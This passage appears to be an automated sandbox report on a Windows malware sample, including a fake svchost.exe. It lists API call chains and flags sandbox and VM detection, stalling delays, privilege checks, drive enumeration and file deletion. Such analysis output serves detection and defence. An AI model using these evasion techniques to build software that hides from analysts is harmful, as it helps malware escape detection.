    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_008A2BB0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_008A2B40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_008A3CE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_008A1460
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_008A25C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserNameA,memset,StrStrIA,6_2_0089ADE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_008A1690
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_00883610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0089CE10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_00881660
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_00887FD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_00895720
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_008A3F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,9_2_02BE6CA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,9_2_02BF2BB0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,9_2_02BF2B40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,9_2_02BD1170
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,9_2_02BDD970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,9_2_02BF1690
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,9_2_02BD3610
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,9_2_02BECE10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,9_2_02BD1660
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,9_2_02BD7FD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,9_2_02BE5720
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,9_2_02BF3F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,9_2_02BF3CE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,9_2_02BF1460
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetUserNameA,memset,StrStrIA,9_2_02BEADE0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,9_2_02BF25C0
    Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date2_2_00403A20
    Found evasive API chain (may stop execution after checking volume information)
    Source: C:\Users\user\Desktop\arxtPs1STE.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-30456
    Found evasive API chain checking for user administrative privileges
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-30488
    Found stalling execution ending in API Sleep call
    Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_2-82503
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLLJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLLJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,2_2_02BC78A0
    Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 3946Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 804Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 761Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 2840Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_02BC79D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008E79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_008E79D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008979D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_008979D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BE79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,9_2_02BE79D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeAPI coverage: 2.2 %
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeAPI coverage: 2.2 %
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeAPI coverage: 2.2 %
    Source: C:\Windows\apppatch\svchost.exe TID: 7716Thread sleep count: 3946 > 30Jump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 7716Thread sleep time: -394600s >= -30000sJump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 2680Thread sleep count: 804 > 30Jump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 2680Thread sleep time: -80400s >= -30000sJump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 4296Thread sleep count: 761 > 30Jump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 4296Thread sleep time: -76100s >= -30000sJump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 7716Thread sleep count: 2840 > 30Jump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 7716Thread sleep time: -284000s >= -30000sJump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 7656Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02BD9910
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB7680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02BB7680
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_02BDDAE8
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_02BDDA50
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCD120
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008F9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_008F9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008ED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_008ED120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_008FDAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008FDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_008FDA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008D7680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_008D7680
